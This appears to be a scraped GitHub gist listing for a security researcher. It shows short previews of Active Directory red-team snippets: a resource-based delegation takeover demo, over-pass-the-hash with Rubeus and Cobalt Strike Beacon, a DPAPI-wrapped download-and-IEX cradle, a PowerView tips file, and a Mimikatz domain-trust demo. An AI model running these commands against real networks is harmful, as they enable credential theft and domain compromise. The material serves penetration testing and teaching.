geeking out about Kerberos

Will HarmJ0y

HarmJ0y / rbcd_demo.ps1
Last active Mar 13, 2020
Resource-based constrained delegation computer DACL takeover demo
View rbcd_demo.ps1
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
HarmJ0y / gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active Mar 20, 2020
Over-pass-the-hash with Rubeus and Beacon
View gist:dc379107cfb4aa7ef5c3ecbac0133a02
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
HarmJ0y / cobaltstrike_sa.txt
Created Sep 28, 2018
Cobalt Strike Situational Awareness Commands
View cobaltstrike_sa.txt
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
HarmJ0y / New-SYSVOLZip.ps1
Created Aug 8, 2017
Compresses all of SYSVOL to a local .zip file.
View New-SYSVOLZip.ps1
function New-SYSVOLZip {
Compresses all folders/files in SYSVOL to a .zip file.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
View DPAPI.ps1
Add-Type -AssemblyName System.Security
$Content = (New-Object Net.Webclient).DownloadString('')
$Bytes = ([Text.Encoding]::ASCII).GetBytes($Content)
$EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)
IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)))
HarmJ0y / PowerView-3.0-tricks.ps1
Last active Apr 3, 2020
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
View Get-NonstandardService.ps1
function Get-NonstandardService {
Returns services where the associated binaries are either not signed, or are
signed by an issuer not matching 'Microsoft'.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
View powershell_talks.txt
BSides LV 2015 - "Building an Empire with PowerShell" -
BSides DC 2015 - "Bridging the Gap: Lessons in Adversarial Tradecraft" -
BSides DC 2015 - "** It, Do it Live (PowerShell Digital Forensics)" -
PowerShell Summit 2016 - "Digital Forensics with PowerShell" -
BSides LV 2016 - "Building an EmPyre with Python" -
DerbyCon 2016 - "A Year in the Empire" -
HarmJ0y / ConvertFrom-UserParameter.ps1
Last active Sep 16, 2019
View ConvertFrom-UserParameter.ps1
function ConvertFrom-UserParameter {
Converts a userparameters encoded blob into an ordered dictionary of decoded values.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
HarmJ0y / 44con_demo.ps1
Created Sep 17, 2016
Demo for the 44con "Trusts You Might Have Missed" presentation
View 44con_demo.ps1
# import PowerView and Invoke-Mimikatz
Import-Module .\powerview.ps1
Import-Module .\mimikatz.ps1
# map all reachable domain trusts
# enumerate groups with 'foreign' users, and convert the foreign principal SIDs to names
Find-ForeignGroup -Domain external.local
Find-ForeignGroup -Domain external.local | Select-Object -ExpandProperty UserName | Convert-SidToName